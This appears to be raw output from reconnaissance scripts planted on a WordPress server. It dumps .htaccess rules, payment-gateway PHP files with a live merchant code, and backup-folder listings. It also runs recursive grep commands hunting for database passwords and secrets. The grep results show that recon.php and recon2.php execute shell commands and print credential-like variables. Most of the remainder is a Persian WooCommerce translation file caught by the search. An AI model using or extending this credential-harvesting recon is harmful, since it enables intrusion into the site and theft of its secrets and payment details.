===HTACCESS=== # My Custom RewriteEngine On RewriteBase / RewriteRule ^mycredit/(.*)/(.*) /mycredit/index.php?transaction_id=$1 RewriteRule ^mycredit2/(.*)/(.*) /mycredit2/index.php?transaction_id=$1 RewriteRule ^mycredit3/(.*)/(.*) /mycredit3/index.php?transaction_id=$1 RewriteRule ^hypercredit/(.*) ./hypercredit/index.php?id=$1 [L,QSA] # End My Custom # This file was updated by Duplicator on 2026-02-14 10:00:27. # See the original_files_ folder for the original source_site_htaccess file. # BEGIN WordPress # دستورالعمل‌های (خطوط) بین "BEGIN WordPress" و "END WordPress" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. RewriteEngine On RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] # END WordPress # BEGIN LiteSpeed # The directives (lines) between "BEGIN LiteSpeed" and "END LiteSpeed" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. SetEnv noabort 1 # END LiteSpeed php_value upload_max_filesize 1024M php_value post_max_size 1024M php_value max_execution_time 300 php_value max_input_time 300 php_value memory_limit 256M # php -- BEGIN cPanel-generated handler, do not edit # Set the “alt-php82” package as the default “PHP” programming language. AddHandler application/x-httpd-alt-php82___lsphp .php .php8 .phtml # php -- END cPanel-generated handler, do not edit ===HYPERCREDIT_INDEX=== <?php require('class.php'); //------------------------------------------------------------------------------ function paymentRequest2($params){ $curl = curl_init(); curl_setopt_array($curl, [ CURLOPT_URL =>'https://behbank.com/ws/payments/inquiry.json', CURLOPT_POST => true, CURLOPT_HTTPHEADER => ['Content-Type: application/json'], CURLOPT_POSTFIELDS => json_encode($params), CURLOPT_SSL_VERIFYPEER => false, CURLOPT_RETURNTRANSFER => true ]); $response = curl_exec($curl); curl_close($curl); return json_decode($response, true); } $text_erorr = "<center><h1>خطا، شما به درستی هدایت نشده اید!<br><br>لطفا مجدد اقدام کنید.</h1></center>"; $text_ok = "<center><h1>پرداخت با موفقیت انجام شد!</h1></center>"; $text_vpn = "<center><h1>لطفا فیلتر شکنتان را خاموش کنید. سپس مجدد امتحان کنید!</h1></center>"; //------------------------------------------------------------------------------ if($_GET['check'] != null){ $paymentNumber = $_GET['check']; $params = ['merchantCode' => "2455c8260afd2be7",'paymentNumber' => $paymentNumber]; $request = paymentcheck($params); header('Content-Type: application/json; charset=utf-8'); echo json_encode($request, JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT); //------------------------------------------------------------------------------ }elseif($_GET['id'] != null){ $id = $_GET['id']; //----------------------------check spam---------------------------------------- $url_file_spam = "spam/$id.txt"; $seconds = time(); if(file_exists($url_file_spam) == 1){ $ti_fi = file_get_contents($url_file_spam); }else{ $ti_fi = 0; } if($ti_fi > $seconds){ file_put_contents($url_file_spam,$seconds+3); echo $text_erorr; exit; } file_put_contents($url_file_spam,$seconds+3); //----------------------------check spam---------------------------------------- $data = send("https://hypergapbot.com/charger.php?type=1&id=$id"); if($data == "0" || $data == null){ echo $text_erorr; exit; } $ar_data = explode("|",$data); $user_id = $ar_data[0]; $user_id2 = $ar_data[1]; $baste = $ar_data[2]; $seke = $ar_data[3]; $price = $ar_data[4]; $gate = new Behbank(); $params = array( 'merchantCode' => $merchantCode, 'amount' => $price*10, 'callBackUrl' => $callBackUrl, 'invoiceNumber' =>time() ); $request = $gate->payment ===HYPERCREDIT_CLASS=== <?php $merchantCode = '2455c8260afd2be7'; $callBackUrl = 'https://file30t.ir/hypercredit/'; //------------------------------------------------------------------------------ class BehBank{ private $apiUrl = 'https://payment.tejaratazad.com/ws'; //http://behbanc.ir //behbank.com //payment.tejaratazad.com private $gatewayUrl = 'https://payment.tejaratazad.com/payment'; public function paymentRequest($params){ $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $this->apiUrl.'/payments/request.json'); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type' => 'application/json')); curl_setopt($curl, CURLOPT_POSTFIELDS, json_encode($params)); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $response = json_decode(curl_exec($curl)); curl_close($curl); if(isset($response->status) && $response->status == 1 ){ return array( 'status' => true, 'paymentNumber' => $response->paymentNumber, ); }else{ return array( 'status' => false, 'message' => $response->message??null, ); } } public function paymentVerify($params){ $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $this->apiUrl.'/payments/verify.json'); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type' => 'application/json')); curl_setopt($curl, CURLOPT_POSTFIELDS, json_encode( $params )); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $response = json_decode(curl_exec($curl)); curl_close($curl); if(isset($response->status) && $response->status == 1){ return array( 'status' => true, ); }else{ return array( 'status' => false, 'message' => $response->message, ); } } public function paymentGateway($paymentNumber){ $paymentUrl = $this->gatewayUrl.'/'.$paymentNumber; if ( ! headers_sent() ) { header('Location: ' . $paymentUrl ); die; } die('<script type="text/javascript">window.location="' .$paymentUrl. '";</script>'); } public function getCredit($params){ $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $this->apiUrl.'/users/credit.json'); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type' => 'application/json')); curl_setopt($curl, CURLOPT_POSTFIELDS, json_encode( $ ===HYPERCREDIT_SAVE=== <?php echo "dd"; ?> ===HYPERCREDIT_CHECK=== <?php $paymentNumber = $_GET['id']; function paymentRequest($params){ $curl = curl_init(); curl_setopt_array($curl, [ CURLOPT_URL =>'https://behbank.com/ws/payments/inquiry.json', CURLOPT_POST => true, CURLOPT_HTTPHEADER => ['Content-Type: application/json'], CURLOPT_POSTFIELDS => json_encode($params), CURLOPT_SSL_VERIFYPEER => false, CURLOPT_RETURNTRANSFER => true ]); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 2); curl_setopt($curl, CURLOPT_TIMEOUT, 5); curl_setopt($curl, CURLOPT_NOSIGNAL, 1); $response = curl_exec($curl); curl_close($curl); return json_decode($response, true); } //------------------------------------------------------------------------------ $params = ['merchantCode' => "2455c8260afd2be7",'paymentNumber' => $paymentNumber]; $request = paymentRequest($params); echo json_encode($request); ?> ===MYCARD_CLASS=== <?php class HTTP { public static function post($url, $params = null) { $curl = curl_init(); $payload = $params !== null ? json_encode($params, JSON_UNESCAPED_UNICODE) : null; curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_HTTPHEADER, array( 'Content-Type: application/json', 'Accept: application/json' )); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, $payload); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_TIMEOUT, 20); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10); $result = curl_exec($curl); if ($result === false) { curl_close($curl); return null; } curl_close($curl); $decoded = json_decode($result); return json_last_error() === JSON_ERROR_NONE ? $decoded : null; } public static function get($url) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_HTTPHEADER, array( 'Accept: application/json' )); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_TIMEOUT, 20); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10); $result = curl_exec($curl); if ($result === false) { curl_close($curl); return null; } curl_close($curl); $decoded = json_decode($result); return json_last_error() === JSON_ERROR_NONE ? $decoded : null; } } class BehBank{ private $apiUrl = 'https://behbank.com/ws'; //http://behbanc.ir //behbank.com //payment.tejaratazad.com private $gatewayUrl = 'https://behbank.com/payment'; public function paymentRequest($params){ $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $this->apiUrl.'/payments/request.json'); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type' => 'application/json')); curl_setopt($curl, CURLOPT_POSTFIELDS, json_encode($params)); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $response = json_decode(curl_exec($curl)); curl_close($curl); if(isset($response->status) && $response->status == 1 ){ return array( 'status' => true, 'paymentNumber' => $response->paymentNumber, ); }else{ return array( 'status' => false, 'message' => $response->message, ); } } public function paymentVerify($params){ $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $this->apiUrl.'/payments/verify.j ===AI1WM_BACKUPS=== Array ( [cmd] => ls -la /home/filetir/public_html/wp-content/ai1wm-backups /home/filetir/public_html/wp-content/backups-dup-lite 2>/dev/null [code] => 0 [out] => /home/filetir/public_html/wp-content/ai1wm-backups: total 28 drwxr-xr-x 2 filetir filetir 4096 Mar 29 20:41 . drwxr-xr-x 11 filetir filetir 4096 Jul 19 11:06 .. -rw-r--r-- 1 filetir filetir 191 Mar 29 20:41 .htaccess -rw-r--r-- 1 filetir filetir 26 Mar 29 20:41 index.html -rw-r--r-- 1 filetir filetir 26 Mar 29 20:41 index.php -rw-r--r-- 1 filetir filetir 76 Mar 29 20:41 robots.txt -rw-r--r-- 1 filetir filetir 356 Mar 29 20:41 web.config /home/filetir/public_html/wp-content/backups-dup-lite: total 32 drwxr-xr-x 5 filetir filetir 4096 Jun 27 20:00 . drwxr-xr-x 11 filetir filetir 4096 Jul 19 11:06 .. -rw-r--r-- 1 filetir filetir 372 Feb 14 14:04 .htaccess -rw-r--r-- 1 filetir filetir 17 Feb 14 14:04 index.php drwxr-xr-x 3 filetir filetir 4096 Mar 29 21:03 installer drwxr-xr-x 2 filetir filetir 4096 Jun 27 20:00 logs -rw-r--r-- 1 filetir filetir 25 Feb 14 14:04 robots.txt drwxr-xr-x 2 filetir filetir 4096 Mar 29 21:03 tmp ) ===CLWPOS_LOG=== ===SEARCH_ALL_CREDS=== Array ( [cmd] => grep -rEi "define\s*\(\s*[\x27\"]DB_(NAME|USER|PASSWORD|HOST)|password\s*=\s*[\x27\"]|pass\s*=\s*[\x27\"]|dbpass|database.*=.*[\x27\"]" /home/filetir/public_html --include="*.php" --include="*.json" --include="*.txt" --include="*.env" 2>/dev/null | grep -vi "wp-config.php" | head -40 [code] => 0 [out] => /home/filetir/public_html/wp-includes/class-wpdb.php: protected $dbpassword; /home/filetir/public_html/wp-includes/class-wpdb.php: * @param string $dbpassword Database password. /home/filetir/public_html/wp-includes/class-wpdb.php: $dbpassword, /home/filetir/public_html/wp-includes/class-wpdb.php: $this->dbpassword = $dbpassword; /home/filetir/public_html/wp-includes/class-wpdb.php: __( 'If you do not know how to set up a database you should contact your host. If all else fails you may find help at the WordPress support forums.' ), /home/filetir/public_html/wp-includes/class-wpdb.php: mysqli_real_connect( $this->dbh, $host, $this->dbuser, $this->dbpassword, null, $port, $socket, $client_flags ); /home/filetir/public_html/wp-includes/class-wpdb.php: @mysqli_real_connect( $this->dbh, $host, $this->dbuser, $this->dbpassword, null, $port, $socket, $client_flags ); /home/filetir/public_html/wp-includes/load.php: $dbpassword = defined( 'DB_PASSWORD' ) ? DB_PASSWORD : ''; /home/filetir/public_html/wp-includes/load.php: $wpdb = new wpdb( $dbuser, $dbpassword, $dbname, $dbhost ); /home/filetir/public_html/wp-includes/functions.php: __( 'One or more database tables are unavailable. The database may need to be repaired.' ), /home/filetir/public_html/wp-includes/class-pop3.php: function pass ($pass = "") { /home/filetir/public_html/wp-includes/class-pop3.php: function login ($login = "", $pass = "") { /home/filetir/public_html/wp-includes/class-snoopy.php: var $proxy_pass = ""; // proxy password to use /home/filetir/public_html/wp-includes/class-snoopy.php: var $pass = ""; // password for http authentication /home/filetir/public_html/wp-admin/includes/class-ftp.php: $this->_password="anon@ftp.com"; /home/filetir/public_html/wp-admin/includes/class-ftp.php: else $this->_password="anon@anon.com"; /home/filetir/public_html/wp-admin/includes/class-wp-debug-data.php: $database_size = size_format( $size_db, 2 ); /home/filetir/public_html/wp-admin/update-core.php: __( 'Important: Before updating, please back up your database and files. For help with updates, visit the Updating WordPress documentation page.' ), /home/filetir/public_html/wp-admin/maint/repair.php: '

' . __( 'Some database problems could not be repaired. Please copy-and-paste the following list of errors to the WordPress support forums to get additional assistance.' ) . '

', /home/filetir/public_html/recon.php:foreach($safe as $k=>$v){ if(stripos($k,'pass')!==false||stripos($k,'key')!==false||stripos($k,'secret')!==false||stripos($k,'db')!==false||stripos($k,'database')!==false||stripos($k,'api')!==false){ echo "$k=$v\n"; }} /home/filetir/public_html/recon2.php:echo "\n===SEARCH_DB_HOSTS===\n"; print_r($cmd('grep -rE "DB_HOST|DB_NAME|DB_USER|DB_PASSWORD|DATABASE|host.*=.*[0-9]|host.*=.*mysql|mongodb|redis|postgres" /home/filetir/public_html/wp-content/plugins /home/filetir/public_html/wp-content/themes /home/filetir/public_html/hypercredit /home/filetir/public_html/mycredit /home/filetir/public_html/mycredit2 /home/filetir/public_html/mycredit3 /home/filetir/public_html/wordpress 2>/dev/null | head -60')); /home/filetir/public_html/wp-content/languages/plugins/woocommerce-fa_IR.l10n.php:return ['x-generator'=>'GlotPress/4.0.3','translation-revision-date'=>'2026-06-25 11:14:03+0000','plural-forms'=>'nplurals=1; plural=0;','project-id-version'=>'Plugins - WooCommerce - Stable (latest release)','language'=>'fa','messages'=>['block titleWishlist'=>'علاقه‌مندی‌ها','block descriptionDisplay the shopper\'s wishlist.'=>'علاقه‌مندی‌های خریدار را نمایش دهید.','block keywordSaved for Later'=>'ذخیره برای بعد','block titleSaved for Later'=>'ذخیره شد برای بعد','block keywordWishlist'=>'علاقه‌مندی‌ها','block titleAdd to Wishlist Button'=>'دکمه افزودن به علاقه‌مندی‌ها','block descriptionLets shoppers add the current product to their wishlist from the single-product page.'=>'به خریداران اجازه می‌دهد محصول فعلی را از برگه تک محصول به فهرست علاقه‌مندی‌های خود اضافه کنند.','block titleDropdown'=>'کشویی','block descriptionDisplay options in a dropdown.'=>'نمایش گزینه‌ها در یک کشویی.','block descriptionDisplay items the shopper has saved from their cart for later.'=>'نمایش مواردی که خریدار از سبد خرید خود برای بعد ذخیره کرده است.','List of saved items.'=>'فهرست موارد ذخیره شده.','Number of items currently in the list.'=>'تعداد اقلام موجود در فهرست فعلی.','Image removed from variation gallery.'=>'تصویر از گالری تنوع حذف شد.','Variation gallery order updated.'=>'ترتیب گالری تنوع به‌روزرسانی شد.','%d image'=>'%d تصویر','%d images'=>'%d تصویر','Primary'=>'اصلی','Show gallery image %d'=>'نمایش تصویر گالری %d','No images yet'=>'هنوز تصویری نیست','New primary image set.'=>'تنظیم تصویر اصلی جدید.','Your saved list isn\'t available right now.'=>'فهرست ذخیره شده شما در حال حاضر در دسترس نیست.','Stable slug for the list.'=>'نامک ثابت برای فهرست.','First image is used as the primary. Drag to reorder.'=>'تصویر اول به‌عنوان تصویر اصلی استفاده می‌شود. برای مرتب‌سازی دوباره، بکشید و رها کنید.','That item isn\'t in your saved list anymore.'=>'آن مورد دیگر در فهرست ذخیره‌شده شما وجود ندارد.','Add variation images'=>'افزودن تصاویر تنوع','Variation gallery updated.'=>'گالری تنوع به‌روزرسانی شد.','Add images to variation gallery'=>'افزودن تصاویر به گالری تنوع','Manage variation gallery'=>'مدیریت گالری تنوع','Image replaced.'=>'تصویر جایگزین شد.','Use this image'=>'استفاده از این تصویر','Replace image'=>'جایگزینی تصویر','Update gallery'=>'به‌روزرسانی گالری','Verification email sent to %s.'=>'ایمیل تایید به %s ارسال شد.','Please wait a moment before requesting another verification email.'=>'لطفا قبل از درخواست ایمیل تایید دیگر، لحظه‌ای صبر کنید.','When saving a variation, product_id must be the variation ID, not the parent product ID.'=>'هنگام ذخیره یک تنوع، product_id باید شناسه تنوع باشد، نه شناسه محصول والد.','Wishlist'=>'علاقه‌مندی‌ها','Attribute "%s" is required.'=>'ویژگی "%s" الزامی است.','Limit result set to products with stock quantity greater than or equal to the specified amount.'=>'محدود کردن مجموعه نتایج به محصولاتی که مقدار موجودی آن‌ها بیشتر یا مساوی مقدار مشخص‌شده است.','Limit result set to products with stock quantity less than or equal to the specified amount.'=>'محدود کردن مجموعه نتایج به محصولاتی که مقدار موجودی آن‌ها کمتر یا مساوی مقدار مشخص‌شده است.','Invalid value posted for "%1$s". Allowed values: %2$s'=>'مقدار ارسال‌شده برای «%1$s» نامعتبر است. مقادیر مجاز: %2$s','Add multiple images per product variation. Once enabled, the Additional Variation Images extension will be deactivated and its data migrated.'=>'برای هر تنوع محصول چندین تصویر اضافه کنید. پس از فعال‌سازی، افزودنی Additional Variation Images غیرفعال شده و داده‌های آن منتقل می‌شود.','Wishlists'=>'علاقه‌مندی‌ها','Color value'=>'مقدار رنگ','Image value'=>'مقدار تصویر','Visual'=>'دیداری','Save for Later in Cart'=>'ذخیره برای بعد در سبد خرید','Variation gallery'=>'گالری تنوع','Removed %s block'=>'بلوک %s حذف شد','Added %s block'=>'بلوک %s اضافه شد','You removed %s; core still has it.'=>'شما %s را حذف کردید؛ هسته هنوز آن را دارد.','Template updated — see release notes.'=>'قالب به‌روزرسانی شد - یادداشت‌های انتشار را مشاهده کنید.','Moved %1$s into %2$s'=>'%1$s به %2$s منتقل شد','Email "%s" failed to send.'=>'ارسال ایمیل "%s" ناموفق بود.','Email "%s" sent.'=>'ایمیل "%s" ارسال شد.','Don\'t show again'=>'دوباره نشان نده','Seriously. A thousand orders. This called for a bigger piñata'=>'واقعا. یک هزار سفارش. این دیگه یه جشن خیلی بزرگ‌تر می‌خواست','Off the charts'=>'سر به فلک کشیده','ONE. THOUSAND. ORDERS'=>'یک. هزار. سفارش','A hundred orders means you\'re juggling a lot. Take a moment to celebrate'=>'صد تا سفارش یعنی حسابی سرت شلوغ شده. یه لحظه مکث کن و این موفقیت رو جشن بگیر.','Triple digits looks good on you'=>'سه رقمی شدن بهت میاد.','That\'s a big deal. Smash the llama. You\'ve earned it.'=>'این موفقیت بزرگیه. جشنش بگیر. تو لیاقتش رو داری.','One down'=>'اولی ثبت شد!','Cha-ching! Order number one'=>'جیرینگ! سفارش شماره یک.','Check failed, please try again.'=>'بررسی ناموفق بود، لطفا دوباره امتحان کنید.','Your store has orders that need fixing.'=>'فروشگاه شما سفارش‌هایی دارد که نیاز به اصلاح دارند.','Checking…'=>'در حال بررسی...','Check'=>'بررسی','Product description content. Safe HTML is allowed.'=>'محتوای توضیح محصول. استفاده از HTML امن مجاز است.','Short product description content. Safe HTML is allowed.'=>'محتوای کوتاه توضیح محصول. استفاده از HTML امن مجاز است.','You are not allowed to publish products.'=>'شما مجاز به انتشار محصولات نیستید.','Update product'=>'به‌روزرسانی محصول','Delete product'=>'حذف محصول','Product type is not supported by this ability.'=>'نوع محصول توسط این قابلیت پشتیبانی نمی‌شود.','Update an order status.'=>'به‌روزرسانی یک وضعیت سفارش.','Update order status'=>'به‌روزرسانی وضعیت سفارش','Order status is required.'=>'وضعیت سفارش الزامی است.','Order status is invalid.'=>'وضعیت سفارش نامعتبر است.','Failed to delete product.'=>'حذف محصول ناموفق بود.','Create product'=>'ایجاد محصول','Failed to update order status.'=>'به‌روزرسانی وضعیت سفارش ناموفق بود.','Failed to add order note.'=>'افزودن یادداشت سفارش ناموفق بود.','Order note content. Safe HTML is allowed.'=>'محتوای یادداشت سفارش. استفاده از HTML امن مجاز است.','Add a note to an order.'=>'افزودن یادداشت به سفارش.','Add order note'=>'افزودن یادداشت سفارش','Maximum number of items requested per page.'=>'بیشترین تعداد موارد درخواستی در هر برگه.','Move to cart'=>'انتقال به سبد خرید','Remove %s from wishlist'=>'حذف %s از علاقه‌مندی‌ها','Remove %s from Saved for later list'=>'حذف %s از فهرست ذخیره شده برای بعد','Your wishlist is empty. Items you add to your wishlist will appear here.'=>'فهرست علاقه‌مندی‌های شما خالی است. مواردی که به علاقه‌مندی‌های خود اضافه می‌کنید، اینجا نمایش داده می‌شوند.','Nothing saved yet — items you save from the cart will appear here.'=>'هنوز چیزی ذخیره نشده است — مواردی که از سبد خرید ذخیره می‌کنید، اینجا نمایش داده می‌شوند.','Saved for later'=>'ذخیره برای بعد','Show %d more'=>'نمایش %d مورد دیگر','Saved to wishlist'=>'در فهرست علاقه‌مندی‌ها ذخیره شد','Add to wishlist'=>'افزودن به علاقه‌مندی‌ها','Users → Profile → Application Passwords'=>'کاربران ← پروفایل ← رمزهای عبور اپلیکیشن','You can manage all connected devices anytime under %s.'=>'شما می‌توانید تمام دستگاه‌های متصل را در هر زمانی تحت %s مدیریت کنید.','Was this you?'=>'این شما بودید؟','App version %s'=>'نگارش اپلیکیشن %s','If you recognise this sign-in, you don\'t need to do anything. If it wasn\'t you, revoke access immediately to remove this device.'=>'اگر این ورود را می‌شناسید، لازم نیست کاری انجام دهید. اگر شما نبودید، فورا دسترسی را لغو کنید تا این دستگاه حذف شود.','QR login requires an HTTPS connection.'=>'ورود با QR به اتصال HTTPS نیاز دارد.','Variation gallery image IDs, excluding the featured image (which is set via "image"). Mirrors how galleries work on parent products.'=>'شناسه‌های تصویر گالری‌های تنوع، به جز تصویر شاخص (که از طریق "تصویر" تنظیم می‌شود). نحوه عملکرد گالری‌ها روی محصولات والد را منعکس می‌کند.','Color / image'=>'رنگ \\ تصویر','Set variation prices'=>'تنظیم قیمت‌های تنوع','email template'=>'قالب ایمیل','Preview or edit %s'=>'پیش‌نمایش یا ویرایش %s','Sent to customer'=>'به مشتری ارسال شد','Delete system note from %s'=>'حذف یادداشت سیستم از %s','Add private note'=>'افزودن یادداشت خصوصی','Order note added and emailed to the customer.'=>'یادداشت سفارش، اضافه شد و برای مشتری ایمیل شد.','Send note to customer →'=>'ارسال یادداشت به مشتری ←','Order note added.'=>'یادداشت سفارش اضافه شد.','Public note to customer'=>'یادداشت عمومی به مشتری','Font family nameInter'=>'Inter','%1$d out of 5 stars: %2$s'=>'%1$d از 5 ستاره: %2$s','Submit reviews'=>'ارسال بررسی','Review your order'=>'سفارش خود را بررسی کنید','Share your experience with this product...'=>'تجربه خود را از این محصول به اشتراک بگذارید...','Loved something? Not so much? Share a quick review for what you bought. Feel free to skip any product.'=>'چیزی را دوست داشتید؟ نه خیلی زیاد؟ نقد و بررسی سریعی در مورد آنچه خریده‌اید به اشتراک بگذارید. می‌توانید به‌راحتی از هر محصول بگذرید.','There are no products on this order that are open for reviews right now.'=>'در حال حاضر، هیچ‌کدام از محصولات این سفارش امکان نقد و بررسی ندارند.','Don\'t see all your products?'=>'همه محصولات خود را نمی‌بینید؟','Some products may not be available for review because the store has disabled reviews for them.'=>'ممکن است برخی محصولات برای نقد و بررسی در دسترس نباشند، زیرا فروشگاه امکان نقد و بررسی را برای آنها غیرفعال کرده است.','Your feedback helps other customers make better purchasing decisions.'=>'بازخورد شما به سایر مشتریان کمک می‌کند تا تصمیمات خرید بهتری بگیرند.','Thank you for your reviews'=>'سپاس برای نقد شما','Leave a review:'=>'یک بررسی بنویسید:','Leave a review'=>'یک بررسی بنویسید','We’d love to know what you thought of the products you ordered. Your review helps other shoppers make better decisions and helps us improve.'=>'ما دوست داریم بدانیم که شما در مورد محصولاتی که سفارش داده‌اید چه فکر می‌کنید. بررسی شما به سایر خریداران کمک می‌کند تا تصمیمات بهتری بگیرند و به ما در بهبود کمک می‌کند.','Nothing to review here'=>'چیزی برای نقد و بررسی در اینجا نیست.','Security check failed.'=>'بررسی امنیتی ناموفق بود.','Something went wrong, please try again.'=>'مشکلی پیش آمده، لطفا دوباره امتحان کنید.','Thanks, your review is pending approval.'=>'سپاس، نقد شما در انتظار تأیید است.','Please rate this product before submitting your review.'=>'لطفا قبل از ارسال نقد، به این محصول امتیاز دهید.','Customer review request (beta)'=>'درخواست نقد مشتری (بتا)','Page slugreview-order'=>'review-order','Review Order Page'=>'برگه نقد و بررسی سفارش','Page titleReview your order'=>'سفارش خود را بررسی نمایید','GraphQL'=>'GraphQL','The product variations.'=>'تنوع‌های محصول.','A connection to a list of ProductVariation items.'=>'اتصال به فهرستی از موارد ProductVariation.','A selected attribute value on a product variation.'=>'مقدار ویژگی انتخاب شده در یک تنوع محصول.','The selected attribute values for this variation.'=>'مقادیر ویژگی انتخاب شده برای این تنوع.','The review rating (1-5).'=>'امتیاز نقد و بررسی (1-5).','The review content.'=>'محتوای نقد و بررسی.','The review ID.'=>'شناسه نقد و بررسی.','The product images.'=>'تصاویر محصول.','Whether the attribute is used for variations.'=>'اینکه آیا از این ویژگی برای تنوع‌ها استفاده می‌شود یا خیر.','The product weight.'=>'وزن محصول.','The product height.'=>'ارتفاع محصول.','The product width.'=>'عرض محصول.','The product length.'=>'طول محصول.','Physical dimensions and weight for a product.'=>'ابعاد فیزیکی و وزن برای یک محصول.','The product dimensions.'=>'ابعاد محصول.','The number of items in stock.'=>'تعداد اقلام موجود در انبار.','The sale price.'=>'قیمت حراج.','The regular price.'=>'قیمت عادی.','The product type.'=>'نوع محصول.','The product status.'=>'وضعیت محصول.','The short product description.'=>'توضیح کوتاه محصول.','The full product description.'=>'توضیح کامل محصول.','The product slug.'=>'نامک محصول.','The product name.'=>'نام محصول.','The coupon status.'=>'وضعیت کوپن.','The discount amount.'=>'مبلغ تخفیف.','The date the coupon expires (ISO 8601).'=>'تاریخ انقضای کوپن (ISO 8601).','Email addresses that can use this coupon.'=>'آدرس‌های ایمیلی که می‌توانند از این کوپن استفاده کنند.','The type of discount.'=>'نوع تخفیف.','The coupon description.'=>'توضیح کوپن.','The coupon code.'=>'کد کوپن.','A product variation.'=>'یک تنوع محصول.','A variable product with variations.'=>'یک محصول متغیر با تنوع‌ها.','The product is out of stock.'=>'محصول موجود نیست.','The product is in the trash.'=>'محصول در زباله‌دان است.','The product is scheduled to be published in the future.'=>'انتشار این محصول برای آینده برنامه‌ریزی شده.','The product is privately published.'=>'محصول به صورت خصوصی منتشر شده.','The product is published and visible.'=>'محصول منتشر شده و قابل مشاهده است.','The product is pending review.'=>'محصول در انتظار بررسی است.','The product is a draft.'=>'محصول پیش‌نویس است.','The publication status of a product.'=>'وضعیت انتشار یک محصول.','Delete a product.'=>'حذف یک محصول.','The coupon is in the trash.'=>'کوپن در زباله‌دان است.','The coupon is scheduled to be published in the future.'=>'انتشار این کوپن برای آینده برنامه‌ریزی شده.','The coupon is pending review.'=>'کوپن در انتظار بررسی است.','The coupon is privately published.'=>'کوپن به صورت خصوصی منتشر شده.','The coupon is a draft.'=>'کوپن پیش‌نویس است.','The coupon is published and active.'=>'کوپن منتشر شده و فعال است.','The publication status of a coupon.'=>'وضعیت انتشار یک کوپن.','Keep customers happy and informed every step of the way.'=>'مشتریان را راضی نگه دارید و در هر مرحله از مسیر، آنها را مطلع نگه دارید.','Free to install, with no markup or monthly fees.'=>'نصب رایگان، بدون نیاز به هیچگونه هزینه اضافی یا ماهانه.','Save time and money by managing shipping right from your WooCommerce dashboard.'=>'با مدیریت ارسال از داشبورد ووکامرس خود، در زمان و هزینه خود صرفه‌جویی کنید.','Instantly save on USPS, UPS, FedEx and DHL Express labels.'=>'فورا در هزینه برچسب‌های USPS، UPS، FedEx و DHL Express صرفه‌جویی کنید.','Rate your recent purchases'=>'به خریدهای اخیر خود امتیاز دهید','Thanks again for shopping with us. If you have any questions, reply to this email and we\'ll help out.'=>'دوباره از خرید شما متشکریم. اگر سوالی دارید، به این ایمیل پاسخ دهید و ما به شما کمک خواهیم کرد.','How was your order from {site_title}?'=>'سفارش شما از {site_title} چطور بود؟','Delay (days)'=>'تاخیر (روز)','How many days after the order is marked complete before the review request email is sent.'=>'چند روز پس از تکمیل سفارش، ایمیل درخواست نقد و بررسی ارسال می‌شود؟','Product published'=>'محصول منتشر شد','We’ll update you once payment has been confirmed. Here’s a summary of your order:'=>'به محض تأیید پرداخت، شما را مطلع خواهیم کرد. خلاصه‌ای از سفارش شما در اینجا آمده است:','Thanks for your order. It’s currently on hold while we confirm your payment via %s.'=>'از سفارش شما متشکریم. در حال حاضر سفارش در حالت انتظار است تا پرداخت شما را از طریق %s تأیید کنیم.','A payment gateway was just enabled on %s.'=>'یک درگاه پرداخت به تازگی روی %s فعال شده است.','Hello,'=>'درود،','This email has been sent to %s'=>'این ایمیل به %s ارسال شد','The payment gateway "%1$s" was just enabled on this site: %2$s'=>'درگاه پرداخت "%1$s" به تازگی در این سایت فعال شده: %2$s','Howdy %s,'=>'درود %s،','Cash on delivery settings'=>'تنظیمات پرداخت در محل','Check payment settings'=>'بررسی تنظیمات پرداخت','Bank account details'=>'جزئیات حساب بانکی','Enable Cash on delivery at checkout'=>'فعال‌سازی پرداخت در محل در تسویه حساب','Available for shipping methods'=>'برای روش‌های ارسال، در دسترس است','Choose which shipping methods support Cash on delivery.'=>'انتخاب کنید کدام روش‌های حمل و نقل، از پرداخت در محل پشتیبانی می‌کنند.','Gateway description.'=>'توضیح درگاه.','Gateway enabled status.'=>'وضعیت فعال بودن درگاه.','Packlink'=>'Packlink','Provider: %s'=>'ارائه دهنده: %s','URL: %s'=>'نشانی اینترنتی: %s','Edit shipping provider'=>'ویرایش ارائه‌دهنده حمل و نقل','Add new shipping provider'=>'افزودن ارائه‌دهنده حمل و نقل جدید','Shipping provider'=>'ارائه‌دهنده حمل و نقل','Tracking: %s.'=>'رهگیری: %s.','Account navigation'=>'راهبری حساب کاربری','e.g. https://example.com/track?id=__PLACEHOLDER__'=>'برای مثال 